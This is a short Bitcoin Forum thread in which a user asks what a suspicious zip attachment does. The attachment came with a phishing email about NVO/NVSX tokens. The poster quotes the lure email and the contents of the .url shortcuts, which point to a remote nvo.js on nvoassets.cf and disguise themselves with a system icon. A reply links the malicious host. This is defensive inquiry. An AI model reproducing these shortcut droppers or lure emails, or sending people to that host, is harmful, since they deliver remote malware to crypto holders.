Bitcoin Forum
September 02, 2024, 04:09:20 AM *
News: Latest Bitcoin Core release: 27.1 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: suspicious zip-file form nvsx.io. What can it do?  (Read 122 times)
vlom (OP)
Legendary
*
Offline Offline

Activity: 1498
Merit: 1117


View Profile
January 29, 2018, 08:33:22 PM
 #1

Hi

I received an e-mail with a zip file. Nothing spezial you may think. But because it is related to an altcoin it would like to ask here if anybody could tell me what the content of the zip file is intended to do.

This is the e-Mail

From: support@nvsx.io
Subject: Your Invitation to Join the Beta: NVO.IO - NVST - NVSX
Date: 26 January 2018 at 20:04:20 GMT+1
To: undisclosed-recipients:;

Quote
The NVO team is wishing you, a happy and magical New Year.
- You can check your following investment, with the links attached.
- We thank you for the participation, and funding of the initial NVST and NVSX token.

- Whitepaper: https://nvo.io/assets/whitepaper.pdf
We are building a secure and fast decentralized exchange and wallet.
Hope it brings you lots of joy and happiness.

All the best.
Ton Bi – CEO and Founder

attached is a zip file.
I transfered the zip to an Linux VPS to open it.

Code:
Archive:  NVSX-74696409.zip
  inflating: Assets-74696409.url     
  inflating: Information.url         
  inflating: NVST-Token.url         
  inflating: NVSX-Token.url

Then i opened the files with nano.

Assets-74696409.url
Code:
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
URL=file://///nvoassets.cf/users/nvo.zip/nvo.js
IDList=
HotKey=0
IconFile=C:\WINDOWS\System32\shell32.dll
IconIndex=126

Information.url
Code:
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
URL=file://///nvoassets.cf/users/nvo.zip/nvo.js
IDList=
HotKey=0
IconFile=C:\WINDOWS\System32\shell32.dll
IconIndex=126

NVST-Token.url 
Code:
Prop3=19,9
[InternetShortcut]
URL=file://///nvoassets.cf/users/nvo.zip/nvo.js
IDList=
HotKey=0
IconFile=C:\WINDOWS\System32\shell32.dll
IconIndex=126

Can anybody see what this is all about? What would have happened if i opened the zip.

Thank you very much
jambola2
Legendary
*
Offline Offline

Activity: 1120
Merit: 1038


View Profile
January 29, 2018, 08:52:10 PM
 #2

This url might be a good start: http://nvoassets.cf/users/
And this looks exactly like the zip you received: http://nvoassets.cf/users/74696409/

If you explore the file structure there, it seems a lot like the file you received... And it seems like the files you received are some sort of link to there..
I'm not quite sure what's going on either.


No longer active on bitcointalk, however, you can still reach me via PMs if needed.
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!